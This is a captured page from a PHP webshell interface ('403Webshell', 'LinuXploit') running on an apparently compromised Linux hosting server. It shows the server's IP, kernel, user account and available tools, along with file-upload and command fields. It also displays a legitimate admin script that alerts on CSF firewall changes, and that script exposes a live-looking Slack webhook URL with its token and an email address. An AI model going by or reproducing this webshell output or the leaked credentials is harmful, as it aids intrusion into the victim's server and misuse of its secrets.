- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.116.62.254
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/ddos/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/ddos/firewall_mod_bak
################################################################
#                                                              #
#       Script to Check CSF Firewall is disabled or enabled    #
#                                                              #
#       APSC InfoTech & Software Solutions Pvt Ltd             #
#                                                              #
#                                    -=-By=-SACHIN DEORE-=-=-  #
#                                                              #
#                                                              #
################################################################

# Taking Hosting Name
SERVER=$(/bin/hostname)

# Taking values of modification
CSFCONF=$(/usr/bin/find /etc/csf/ -mmin -5 -name csf.conf|wc -l)
CSFCHNG=$(/bin/cat /etc/csf/csf.conf_changes |wc | awk '{ print $5 " " $1 }')
# Checking if csf.conf was modified or not

if [ $CSFCONF -eq 1 ]
	then
	diff -a --suppress-common-lines /etc/csf/csf.conf /etc/csf/csf.conf_testing > /etc/csf/csf.conf_changes
		if [ $CSFCHNG -eq 0 ]
			then
		exit
else

echo -e "
Hello,

ATTENTION !!!!!!

CSF Firewall has been modified on $SERVER in last 5 mins.

Below are the changes: < Means 'AFTER' and > Means 'BEFORE'

$(/bin/cat /etc/csf/csf.conf_changes)


Thanks,
Admin
APSC Infotech & Software Solutions Pvt Ltd.
" |mail -s "ATTENTION!! - csf.conf file modified on $SERVER" -c apscservers@gmail.com apscservers@gmail.com | curl -X POST --data-urlencode 'payload={ "username": "webhookbot", "text": "ATTENTION!! - csf.conf file modified on kara.dnsnetservice.com Server. Please check email apscservers@gmail.com for details", "icon_emoji": ":ghost:"}' https://hooks.slack.com/services/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
cd /etc/csf/
rm -rfv csf.conf_testing
cp csf.conf csf.conf_testing
rm -rfv csf.conf_changes
touch csf.conf_changes
exit
fi
fi

Youez - 2016 - github.com/yon3zu
LinuXploit